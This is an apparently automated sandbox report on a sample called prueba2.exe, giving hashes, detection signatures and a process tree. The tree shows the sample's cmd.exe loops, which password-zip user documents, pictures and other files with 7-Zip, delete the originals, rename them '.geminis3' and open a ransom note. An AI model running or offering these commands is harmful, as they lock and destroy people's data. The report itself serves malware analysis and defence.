Overview

overview

3

Static

static

prueba2.exe

windows7_x64

1

prueba2.exe

windows10_x64

3

Analysis

  • max time kernel
    107s
  • max time network
    74s
  • platform
    windows7_x64
  • resource
    win7v200410
  • submitted
    28-04-2020 01:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    prueba2.exe

  • Size

    329KB

  • MD5

    9f5f9c71bb71b8e1571fc4d27721a99e

  • SHA1

    e64de07b46d896d25dc059dd774a140f109364c3

  • SHA256

    be3d67f3432d29b8339b324a0ee3150039da4cd7e95a3dcb564cca70f572603f

  • SHA512

    6c5f031ef96f6fb930bb57c0cc1287f2f34d21475f2710f88341f955405e9cc37143a037939d5cd8387fe80f63ef9ad3ca7b70575d75dcfbca475bda9d941c16

Score
1/10

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 84 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\prueba2.exe
    "C:\Users\Admin\AppData\Local\Temp\prueba2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
      2⤵
        PID:1116
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Are.docx.geminis3" "C:\Users\Admin\Documents\Are.docx"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:316
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Files.docx.geminis3" "C:\Users\Admin\Documents\Files.docx"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1128
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Opened.docx.geminis3" "C:\Users\Admin\Documents\Opened.docx"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1316
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Recently.docx.geminis3" "C:\Users\Admin\Documents\Recently.docx"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:624
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\StepMount.docm.geminis3" "C:\Users\Admin\Documents\StepMount.docm"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1336
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\These.docx.geminis3" "C:\Users\Admin\Documents\These.docx"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1436
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\UseAssert.docm.geminis3" "C:\Users\Admin\Documents\UseAssert.docm"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1476
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\OutBackup.pdf.geminis3" "C:\Users\Admin\Documents\OutBackup.pdf"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1520
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\BlockDebug.xlsm.geminis3" "C:\Users\Admin\Documents\BlockDebug.xlsm"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1612
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\EnterMerge.xls.geminis3" "C:\Users\Admin\Documents\EnterMerge.xls"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1624
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\MeasureApprove.xls.geminis3" "C:\Users\Admin\Documents\MeasureApprove.xls"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1656
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\ConvertToEdit.pptx.geminis3" "C:\Users\Admin\Documents\ConvertToEdit.pptx"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1668
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\NewMeasure.pptx.geminis3" "C:\Users\Admin\Documents\NewMeasure.pptx"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1664
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Pictures %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
        2⤵
          PID:1004
          • C:\PROGRA~1\7-ZIP\7z.exe
            "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\ConnectComplete.jpg.geminis3" "C:\Users\Admin\Pictures\ConnectComplete.jpg"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1688
          • C:\PROGRA~1\7-ZIP\7z.exe
            "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\ConvertToSend.jpg.geminis3" "C:\Users\Admin\Pictures\ConvertToSend.jpg"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:792
          • C:\PROGRA~1\7-ZIP\7z.exe
            "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\Wallpaper.jpg.geminis3" "C:\Users\Admin\Pictures\Wallpaper.jpg"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:328
          • C:\PROGRA~1\7-ZIP\7z.exe
            "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\RegisterNew.png.geminis3" "C:\Users\Admin\Pictures\RegisterNew.png"
            3⤵
              PID:1692
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Downloads %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
            2⤵
              PID:1704
              • C:\PROGRA~1\7-ZIP\7z.exe
                "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\ConvertToFormat.ppt.geminis3" "C:\Users\Admin\Downloads\ConvertToFormat.ppt"
                3⤵
                  PID:1696
                • C:\PROGRA~1\7-ZIP\7z.exe
                  "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\EnterSync.txt.geminis3" "C:\Users\Admin\Downloads\EnterSync.txt"
                  3⤵
                    PID:1708
                  • C:\PROGRA~1\7-ZIP\7z.exe
                    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\StopOpen.rar.geminis3" "C:\Users\Admin\Downloads\StopOpen.rar"
                    3⤵
                      PID:1720
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Music %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
                    2⤵
                      PID:868
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Videos %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
                      2⤵
                        PID:456
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Desktop %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"
                        2⤵
                          PID:1800
                          • C:\PROGRA~1\7-ZIP\7z.exe
                            "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Desktop\FormatUnlock.7z.geminis3" "C:\Users\Admin\Desktop\FormatUnlock.7z"
                            3⤵
                              PID:1808
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c start README.txt
                            2⤵
                              PID:1768
                              • C:\Windows\system32\NOTEPAD.EXE
                                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\README.txt
                                3⤵
                                • Opens file in notepad (likely ransom note)
                                PID:1736

                          Network

                          MITRE ATT&CK Matrix

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads